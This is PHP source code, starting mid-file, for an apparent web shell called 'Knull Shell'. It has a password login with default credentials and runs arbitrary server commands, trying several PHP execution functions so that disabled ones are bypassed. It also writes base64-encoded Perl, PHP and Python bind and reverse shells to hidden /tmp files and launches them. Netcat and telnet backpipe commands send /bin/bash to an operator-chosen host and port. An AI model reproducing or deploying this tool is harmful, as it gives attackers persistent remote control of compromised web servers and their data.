false); if (isset($_COOKIE[session_name()])) setcookie(session_name(), '', time()-44000, '/'); session_destroy(); } function stripslashes_deep($value) { if (is_array($value)) return array_map('stripslashes_deep', $value); else return stripslashes($value); } // create 'hidden session looking' filename function sess_fname() { return '.sess_'.md5(mt_rand()); } // check for valid port function is_port($port){ $retport = (is_numeric($port) && $port>=0 && $port<=65535) ? true : false; return $retport; } // todo: check for valid ip // execute command by enabled function function exec_method($cmd) { $retval = true; if(is_callable('shell_exec') and !in_array('shell_exec',$disabled_funcs)) { $ret_exec=shell_exec($cmd); } else if (is_callable('passthru') and !in_array('passthru',$disabled_funcs)) { ob_start(); passthru($cmd); $ret_exec=ob_get_contents(); ob_end_clean(); } else if (is_callable('exec') and !in_array('exec',$disabled_funcs)) { $ret_exec=array(); exec($cmd,$ret_exec); } else if (is_callable('system') and !in_array('system',$disabled_funcs)) { ob_start(); system($cmd); $ret_exec=ob_get_contents(); ob_end_clean(); } else if (is_callable('proc_open')and!in_array('proc_open',$disabled_funcs)) { $handle=proc_open($cmd,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); $ret_exec=NULL; while(!feof($pipes[1])) { $ret_exec.=fread($pipes[1],1024); } @proc_close($handle); } else if(is_callable('popen')and!in_array('popen',$disabled_funcs)){ $fp=popen($cmd,'r'); $ret_exec=NULL; } else { $retval = false; } return $retval; } if (get_magic_quotes_gpc()) $_POST = stripslashes_deep($_POST); // Initialize variables $username = isset($_POST['username']) ? $_POST['username'] : ''; $password = isset($_POST['password']) ? $_POST['password'] : ''; $webshcmd = isset($_POST['cmd']) ? $_POST['cmd'] : ''; $rows = isset($_POST['rows']) ? $_POST['rows'] : 24; $columns = isset($_POST['columns']) ? $_POST['columns'] : 80; /* Default username:password is root:toor , replace '435b41068e8665513a20070c033b08b9c66e4332' in the line below with the sha1 hash from the command 'echo -n yourpasswordhere | sha1sum -' */ $ini['users'] = array('root' => 'sha1:435b41068e8665513a20070c033b08b9c66e4332'); // Default settings $default_settings = array('home-directory' => '.'); // Merge settings $ini['settings'] = array_merge($default_settings, $ini['users']); session_start(); if (isset($_POST['logout'])) logout(); // Authentication if (isset($ini['users'][$username])) { if (strchr($ini['users'][$username], ':') === false) { // No seperator = clear text password $_SESSION['authenticated'] = ($ini['users'][$username] == $password); } else { list($fkt, $hash) = explode(':', $ini['users'][$username]); $_SESSION['authenticated'] = ($fkt($password) == $hash); } } // not authed? if (!isset($_SESSION['authenticated'])) $_SESSION['authenticated'] = false; if ($_SESSION['authenticated']) { // Initialise session variables if (empty($_SESSION['cwd'])) { $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); $_SESSION['output'] = ''; } if (!empty($webshcmd)) { // append commmand to output $_SESSION['output'] .= '$ ' . $webshcmd . "\n"; // Initialize cwd if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $webshcmd)) { $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); } elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $webshcmd, $regs)) { // 'cd' command to be handled as internal shell command if ($regs[1]{0} == '/') { // its an absolute path, leave it $new_dir = $regs[1]; } else { // append relative paths to cwd $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; } // '/./' becomes '/' while (strpos($new_dir, '/./') !== false) $new_dir = str_replace('/./', '/', $new_dir); // '//' becomes '/' while (strpos($new_dir, '//') !== false) $new_dir = str_replace('//', '/', $new_dir); // 'x/..' becomes '' while (preg_match('|/\.\.(?!\.)|', $new_dir)) $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); if ($new_dir == '') $new_dir = '/'; if (@chdir($new_dir)) { $_SESSION['cwd'] = $new_dir; } else { $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; } } elseif (trim($command) == 'exit') { logout(); } else { chdir($_SESSION['cwd']); // cannot use putenv() when in safe mode if (!ini_get('safe_mode')) { // putenv the terminal size for programs putenv('ROWS=' . $rows); putenv('COLUMNS=' . $columns); } // alias expansion $length = strcspn($webshcmd, " \t"); $token = substr($webshcmd, 0, $length); if (isset($ini['aliases'][$token])) $webshcmd = $ini['aliases'][$token] . substr($webshcmd, $length); $io = array(); $p = proc_open($webshcmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); // stdout while (!feof($io[1])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8'); } // stderr while (!feof($io[2])) { $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]); proc_close($p); } } echo "

Shells

"; echo "IP: Port: "; // add ip/host validation if (empty($_POST['bd_host']) || $_POST['bd_host'] === 'default') { ; } else if (!is_port($_POST['port'])) { echo '

Invalid port number!

'; } else { $uniqfn = '/tmp/' . sess_fname(); if ($_POST['bd_host'] === 'plbd'){ $bind_pl = "IyEvdXNyL2Jpbi9lbnYgcGVybA0KJFNIRUxMPSIvYmluL2Jhc2ggLWkiOw0KaWYgKEBBUkdWIDwg MSkgeyBleGl0KDEpOyB9DQokTElTVEVOX1BPUlQ9JEFSR1ZbMF07DQp1c2UgU29ja2V0Ow0KJHBy b3RvY29sPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTLCZQRl9JTkVULCZTT0NLX1NU UkVBTSwkcHJvdG9jb2wpIHx8IGRpZSAiZXJyb3I6IHNvY2tldFxuIjsNCnNldHNvY2tvcHQoUyxT T0xfU09DS0VULFNPX1JFVVNFQUREUiwxKTsNCmJpbmQoUyxzb2NrYWRkcl9pbigkTElTVEVOX1BP UlQsSU5BRERSX0FOWSkpIHx8IGRpZSAiZXJyb3I6IGJpbmRcbiI7DQpsaXN0ZW4oUywzKSB8fCBk aWUgImVycm9yOiBsaXN0ZW5cbiI7DQp3aGlsZSgxKQ0Kew0KYWNjZXB0KENPTk4sUyk7DQppZigh KCRwaWQ9Zm9yaykpDQp7DQpkaWUgImVycm9yOiBmb3JrIiBpZiAoIWRlZmluZWQgJHBpZCk7DQpv cGVuIFNURElOLCI8JkNPTk4iOw0Kb3BlbiBTVERPVVQsIj4mQ09OTiI7DQpvcGVuIFNUREVSUiwi PiZDT05OIjsNCmV4ZWMgJFNIRUxMIHx8IGRpZSBwcmludCBDT05OICJlcnJvcjogZXhlYyAkU0hF TExcbiI7DQpjbG9zZSBDT05OOw0KZXhpdCAwOw0KfQ0KfQ0K"; @$fh=fopen($uniqfn,"ab+"); @fwrite($fh,base64_decode($bind_pl)); @fclose($fh); $command = 'perl ' . $uniqfn . ' ' . $_POST['port'] . ' > /dev/null &'; if (exec_method($command)) { echo '

Perl Bindshell (should be) listening on ' . htmlspecialchars($_POST['ip']) . ':' . htmlspecialchars($_POST['port']) . '

'; } else { echo '

Unable to execute Perl Bindshell!

'; } } else if (!empty($_POST['bd_host']) && ($_POST['bd_host'] === 'phpbd')){ $php_bind = "IyEvdXNyL2Jpbi9waHAKPD9waHAJCi8qIApLbnVsbCdzIG1vZGlmaWVkIGBtc2ZwYXlsb2FkIHBo cC9iaW5kX3BocCBSYAoqLwoKaWYgKCRhcmdjID09PSAzKSB7CgpAc2V0X3RpbWVfbGltaXQoMCk7 CkBpZ25vcmVfdXNlcl9hYm9ydCgxKTsgCkBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDAp OwoJCiRkZj1AaW5pX2dldCgnZGlzYWJsZV9mdW5jdGlvbnMnKTsKaWYoIWVtcHR5KCRkZikpewoJ JGRmPXByZWdfcmVwbGFjZSgnL1ssIF0rLycsICcsJywgJGRmKTsKCSRkZj1leHBsb2RlKCcsJywg JGRmKTsKCSRkZj1hcnJheV9tYXAoJ3RyaW0nLCAkZGYpOwp9ZWxzZXsKCSRkZj1hcnJheSgpOwp9 CgokcG9ydD0kYXJndlsyXTsKJGlwPSRhcmd2WzFdOwoKJHNvY2s9QHNvY2tldF9jcmVhdGUoQUZf SU5FVCxTT0NLX1NUUkVBTSxTT0xfVENQKTsKJHJldD1Ac29ja2V0X2JpbmQoJHNvY2ssJGlwLCRw b3J0KTsKJHJldD1Ac29ja2V0X2xpc3Rlbigkc29jayw1KTsKCiRtc2dzb2NrPUBzb2NrZXRfYWNj ZXB0KCRzb2NrKTsKQHNvY2tldF9jbG9zZSgkc29jayk7Cgp3aGlsZShGQUxTRSE9PUBzb2NrZXRf c2VsZWN0KCRyPWFycmF5KCRtc2dzb2NrKSwgJHc9TlVMTCwgJGU9TlVMTCwgTlVMTCkpCnsKCSRv ID0gJyc7CgkkYz1Ac29ja2V0X3JlYWQoJG1zZ3NvY2ssMjA0OCxQSFBfTk9STUFMX1JFQUQpOwoJ aWYoRkFMU0U9PT0kYyl7YnJlYWs7fQoJaWYoc3Vic3RyKCRjLDAsMykgPT0gJ2NkICcpewoJCWNo ZGlyKHN1YnN0cigkYywzLC0xKSk7Cgl9IGVsc2UgaWYgKHN1YnN0cigkYywwLDQpID09ICdxdWl0 JyB8fCBzdWJzdHIoJGMsMCw0KSA9PSAnZXhpdCcpIHsKCQlicmVhazsKCX1lbHNlewoJCWlmIChG QUxTRSAhPT0gc3RycG9zKHN0cnRvbG93ZXIoUEhQX09TKSwgJ3dpbicgKSkgewoJCSRjPSRjLiIg Mj4mMVxuIjsKCX0KCSRpc2M9J2lzX2NhbGxhYmxlJzsKCSRpbmE9J2luX2FycmF5JzsKCQkKCWlm KCRpc2MoJ3N5c3RlbScpYW5kISRpbmEoJ3N5c3RlbScsJGRmKSl7CgkJb2Jfc3RhcnQoKTsKCQlz eXN0ZW0oJGMpOwoJCSRvPW9iX2dldF9jb250ZW50cygpOwoJCW9iX2VuZF9jbGVhbigpOwoJfWVs c2UgaWYoJGlzYygncGFzc3RocnUnKWFuZCEkaW5hKCdwYXNzdGhydScsJGRmKSl7CgkJb2Jfc3Rh cnQoKTsKCQlwYXNzdGhydSgkYyk7CgkJJG89b2JfZ2V0X2NvbnRlbnRzKCk7CgkJb2JfZW5kX2Ns ZWFuKCk7Cgl9ZWxzZSBpZigkaXNjKCdleGVjJylhbmQhJGluYSgnZXhlYycsJGRmKSl7CgkJJG89 YXJyYXkoKTsKCQlleGVjKCRjLCRvKTsKCQkkbz1qb2luKGNocigxMCksJG8pLmNocigxMCk7Cgl9 ZWxzZSBpZigkaXNjKCdwcm9jX29wZW4nKWFuZCEkaW5hKCdwcm9jX29wZW4nLCRkZikpewoJCSRo YW5kbGU9cHJvY19vcGVuKCRjLGFycmF5KGFycmF5KHBpcGUsJ3InKSxhcnJheShwaXBlLCd3Jyks YXJyYXkocGlwZSwndycpKSwkcGlwZXMpOwoJCSRvPU5VTEw7CgkJd2hpbGUoIWZlb2YoJHBpcGVz WzFdKSl7CgkJCSRvLj1mcmVhZCgkcGlwZXNbMV0sMTAyNCk7CgkJfQoJCUBwcm9jX2Nsb3NlKCRo YW5kbGUpOwoJfWVsc2UgaWYoJGlzYygncG9wZW4nKWFuZCEkaW5hKCdwb3BlbicsJGRmKSl7CgkJ JGZwPXBvcGVuKCRjLCdyJyk7CgkJJG89TlVMTDsKCQlpZihpc19yZXNvdXJjZSgkZnApKXsKCQkJ d2hpbGUoIWZlb2YoJGZwKSl7CgkJCQkkby49ZnJlYWQoJGZwLDEwMjQpOwoJCQl9CgkJfQoJCUBw Y2xvc2UoJGZwKTsKCX1lbHNlIGlmKCRpc2MoJ3NoZWxsX2V4ZWMnKWFuZCEkaW5hKCdzaGVsbF9l eGVjJywkZGYpKXsKCQkkbz1zaGVsbF9leGVjKCRjKTsKCX1lbHNlIHsKCQkkbz0wOwoJfQoJCQoJ fQoJQHNvY2tldF93cml0ZSgkbXNnc29jaywkbyxzdHJsZW4oJG8pKTsKfQpAc29ja2V0X2Nsb3Nl KCRtc2dzb2NrKTsKfSBlbHNlIHsKCWVjaG8gJ3VzYWdlOiAnIC4gJGFyZ3ZbMF0gLiAnIHBvcnQn IC4gIlxuIjsKfQoKPz4K"; @$fh=fopen($uniqfn,"wb+"); @fwrite($fh,base64_decode($php_bind)); @fclose($fh); $command = 'php ' . $uniqfn . ' ' . $_POST['ip'] . ' ' . $_POST['port'] . ' > /dev/null &'; if (exec_method($command)) { echo '

PHP Bindshell (should be) listening on ' . htmlspecialchars($_POST['ip']) . ':' . htmlspecialchars($_POST['port']) . '

'; } else { echo '

Unable to execute PHP Bindshell

'; } } else if (!empty($_POST['bd_host']) && ($_POST['bd_host'] === 'phprev')){ $php_rev = 'IyEvdXNyL2Jpbi9waHAKPD9waHAKLyogCktudWxsJ3MgbW9kaWZpZWQgYG1zZnBheWxvYWQgcGhw L3JldmVyc2VfcGhwIExIT1NUPVguWC5YLlggUmBgCiovCgppZiAoJGFyZ2MgPT09IDMpIHsKCgkk aXBhZGRyPSRhcmd2WzFdOwoJJHBvcnQ9JGFyZ3ZbMl07CgkJCglAc2V0X3RpbWVfbGltaXQoMCk7 IEBpZ25vcmVfdXNlcl9hYm9ydCgxKTsgQGluaV9zZXQoJ21heF9leGVjdXRpb25fdGltZScsMCk7 CgkkZGY9QGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7CglpZighZW1wdHkoJGRmKSl7CgkJ JGRmPXByZWdfcmVwbGFjZSgnL1ssIF0rLycsICcsJywgJGRpcyk7CgkJJGRmPWV4cGxvZGUoJywn LCAkZGlzKTsKCQkkZGY9YXJyYXlfbWFwKCd0cmltJywgJGRpcyk7Cgl9ZWxzZXsKCQkkZGY9YXJy YXkoKTsKCX0KCQkJCgoJaWYoIWZ1bmN0aW9uX2V4aXN0cygnY2V4ZScpKXsKCQlmdW5jdGlvbiBj ZXhlKCRjKXsKCQkJZ2xvYmFsICRkZjsKCQkJCgkJaWYgKEZBTFNFICE9PSBzdHJwb3Moc3RydG9s b3dlcihQSFBfT1MpLCAnd2luJyApKSB7CgkJCSRjPSRjLiIgMj4mMVxuIjsKCQl9CgkJJGlzYz0n aXNfY2FsbGFibGUnOwoJCSRpc2E9J2luX2FycmF5JzsKCQkKCQlpZigkaXNjKCdzeXN0ZW0nKWFu ZCEkaXNhKCdzeXN0ZW0nLCRkZikpewoJCQlvYl9zdGFydCgpOwoJCQlzeXN0ZW0oJGMpOwoJCQkk bz1vYl9nZXRfY29udGVudHMoKTsKCQkJb2JfZW5kX2NsZWFuKCk7CgkJfWVsc2UKCQlpZigkaXNj KCdwb3BlbicpYW5kISRpc2EoJ3BvcGVuJywkZGYpKXsKCQkJJGZwPXBvcGVuKCRjLCdyJyk7CgkJ CSRvPU5VTEw7CgkJCWlmKGlzX3Jlc291cmNlKCRmcCkpewoJCQkJd2hpbGUoIWZlb2YoJGZwKSl7 CgkJCQkJJG8uPWZyZWFkKCRmcCwxMDI0KTsKCQkJCX0KCQkJfQoJCQlAcGNsb3NlKCRmcCk7CgkJ fWVsc2UKCQlpZigkaXNjKCdwcm9jX29wZW4nKWFuZCEkaXNhKCdwcm9jX29wZW4nLCRkZikpewoJ CQkkaGFuZGxlPXByb2Nfb3BlbigkYyxhcnJheShhcnJheShwaXBlLCdyJyksYXJyYXkocGlwZSwn dycpLGFycmF5KHBpcGUsJ3cnKSksJHBpcGVzKTsKCQkJJG89TlVMTDsKCQkJd2hpbGUoIWZlb2Yo JHBpcGVzWzFdKSl7CgkJCQkkby49ZnJlYWQoJHBpcGVzWzFdLDEwMjQpOwoJCQl9CgkJCUBwcm9j X2Nsb3NlKCRoYW5kbGUpOwoJCX1lbHNlCgkJaWYoJGlzYygnZXhlYycpYW5kISRpc2EoJ2V4ZWMn LCRkZikpewoJCQkkbz1hcnJheSgpOwoJCQlleGVjKCRjLCRvKTsKCQkJJG89am9pbihjaHIoMTAp LCRvKS5jaHIoMTApOwoJCX1lbHNlCgkJaWYoJGlzYygncGFzc3RocnUnKWFuZCEkaXNhKCdwYXNz dGhydScsJGRmKSl7CgkJCW9iX3N0YXJ0KCk7CgkJCXBhc3N0aHJ1KCRjKTsKCQkJJG89b2JfZ2V0 X2NvbnRlbnRzKCk7CgkJCW9iX2VuZF9jbGVhbigpOwoJCX1lbHNlCgkJaWYoJGlzYygnc2hlbGxf ZXhlYycpYW5kISRpc2EoJ3NoZWxsX2V4ZWMnLCRkZikpewoJCQkkbz1zaGVsbF9leGVjKCRjKTsK CQl9ZWxzZQoJCXsKCQkJJG89MDsKCQl9CgkKCQkJcmV0dXJuICRvOwoJCX0KCX0KCSRub2Z1bmNz PSdubyBleGVjIGZ1bmN0aW9ucyc7CglpZihpc19jYWxsYWJsZSgnZnNvY2tvcGVuJylhbmQhaW5f YXJyYXkoJ2Zzb2Nrb3BlbicsJGRmKSl7CgkJJHM9QGZzb2Nrb3BlbigkaXBhZGRyLCRwb3J0KTsK CQl3aGlsZSgkYz1mcmVhZCgkcywyMDQ4KSl7CgkJCSRvdXQgPSAnJzsKCQkJaWYoc3Vic3RyKCRj LDAsMykgPT0gJ2NkICcpewoJCQkJY2hkaXIoc3Vic3RyKCRjLDMsLTEpKTsKCQkJfSBlbHNlIGlm IChzdWJzdHIoJGMsMCw0KSA9PSAncXVpdCcgfHwgc3Vic3RyKCRjLDAsNCkgPT0gJ2V4aXQnKSB7 CgkJCQlicmVhazsKCQkJfWVsc2V7CgkJCQkkb3V0PWNleGUoc3Vic3RyKCRjLDAsLTEpKTsKCQkJ CWlmKCRvdXQ9PT1mYWxzZSl7CgkJCQkJZndyaXRlKCRzLCRub2Z1bmNzKTsKCQkJCQlicmVhazsK CQkJCX0KCQkJfQoJCQlmd3JpdGUoJHMsJG91dCk7CgkJfQoJCWZjbG9zZSgkcyk7Cgl9ZWxzZXsK CQkkcz1Ac29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApOwoJCUBzb2Nr ZXRfY29ubmVjdCgkcywkaXBhZGRyLCRwb3J0KTsKCQlAc29ja2V0X3dyaXRlKCRzLCJzb2NrZXRf Y3JlYXRlIik7CgkJd2hpbGUoJGM9QHNvY2tldF9yZWFkKCRzLDIwNDgpKXsKCQkJJG91dCA9ICcn OwoJCQlpZihzdWJzdHIoJGMsMCwzKSA9PSAnY2QgJyl7CgkJCQljaGRpcihzdWJzdHIoJGMsMywt MSkpOwoJCQl9IGVsc2UgaWYgKHN1YnN0cigkYywwLDQpID09ICdxdWl0JyB8fCBzdWJzdHIoJGMs MCw0KSA9PSAnZXhpdCcpIHsKCQkJCWJyZWFrOwoJCQl9ZWxzZXsKCQkJCSRvdXQ9Y2V4ZShzdWJz dHIoJGMsMCwtMSkpOwoJCQkJaWYoJG91dD09PWZhbHNlKXsKCQkJCQlAc29ja2V0X3dyaXRlKCRz LCRub2Z1bmNzKTsKCQkJCQlicmVhazsKCQkJCX0KCQkJfQoJCQlAc29ja2V0X3dyaXRlKCRzLCRv dXQsc3RybGVuKCRvdXQpKTsKCQl9CgkJQHNvY2tldF9jbG9zZSgkcyk7Cgl9Cn0gZWxzZSB7CiAg ICAgICAgZWNobyAndXNhZ2U6ICcgLiAkYXJndlswXSAuICcgcG9ydCcgLiAiXG4iOwp9Cgo/Pgo= '; @$fh=fopen($uniqfn,"wb+"); @fwrite($fh,base64_decode($php_rev)); @fclose($fh); $command = 'php ' . $uniqfn . ' ' . $_POST['ip'] . ' ' . $_POST['port'] . ' > /dev/null &'; if (exec_method($command)) { echo '

Check your nc listener on ' . htmlspecialchars($_POST['ip']) . ':' . htmlspecialchars($_POST['port']) . '

'; } else { echo '

Unable to execute PHP reverse shell

'; } } else if (!empty($_POST['bd_host']) && ($_POST['bd_host'] === 'pyrev')){ $py_rev = 'aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHN5cwoKcz1zb2NrZXQuc29ja2V0KHNvY2tldC5B Rl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKcy5jb25uZWN0KChzeXMuYXJndlsxXSxpbnQoc3lz LmFyZ3ZbMl0pKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpv cy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk7 Cg=='; @$fh=fopen($uniqfn,"wb+"); @fwrite($fh,base64_decode($py_rev)); @fclose($fh); $command = 'python ' . $uniqfn . ' ' . $_POST['ip'] . ' ' . $_POST['port'] . ' > /dev/null &'; if (exec_method($command)) { echo '

Check your nc listener on ' . htmlspecialchars($_POST['ip']) . ':' . htmlspecialchars($_POST['port']) . '

'; } else { echo '

Unable to execute Python reverse shell

'; } } else if (!empty($_POST['bd_host']) && ($_POST['bd_host'] === 'ncbp')){ $bpname = '/tmp/' . sess_fname(); $cmdfile = 'mknod ' . $bpname . ' p && nc ' . $_POST['ip'] . ' ' . $_POST['port'] . ' 0<' . $bpname . ' | /bin/bash 1>' . $bpname . ' &'; @$fh=fopen($uniqfn,"wb+"); @fwrite($fh,$cmdfile); @fclose($fh); $command = '/bin/bash ' . $uniqfn . ' > /dev/null &'; if (exec_method($command)) { echo '

Check your Netcat listener on ' . htmlspecialchars($_POST['ip']) . ':' . htmlspecialchars($_POST['port']) . '

'; } else { echo '

Unable to execute Netcat Backpipe

'; } } else if (isset($_POST['bd_host']) && ($_POST['bd_host'] === 'tnbp')){ $bpname = '/tmp/' . sess_fname(); $cmdfile = 'mknod ' . $bpname . ' p && telnet ' . $_POST['ip'] . ' ' . $_POST['port'] . ' 0<' . $bpname . ' | /bin/bash 1>' . $bpname; @$fh=fopen($uniqfn,"wb+"); @fwrite($fh,$cmdfile); @fclose($fh); $command = '/bin/bash ' . $uniqfn . ' > /dev/null &'; if (exec_method($command)) { echo '

Check your Netcat listener on ' . htmlspecialchars($_POST['ip']) . ':' . htmlspecialchars($_POST['port']) . '

'; } else { echo '

Unable to execute Telnet Backpipe

'; } } } echo '
'; } ?> Knull Shell

Authentication

Login failed, please try again:

' . "\n"; ?>

Username:

Password:

Server Details

ServerIP:    VHost:    YourIP:    Software:
UserAgent:
Pwd:
ServerSig:

Size: ×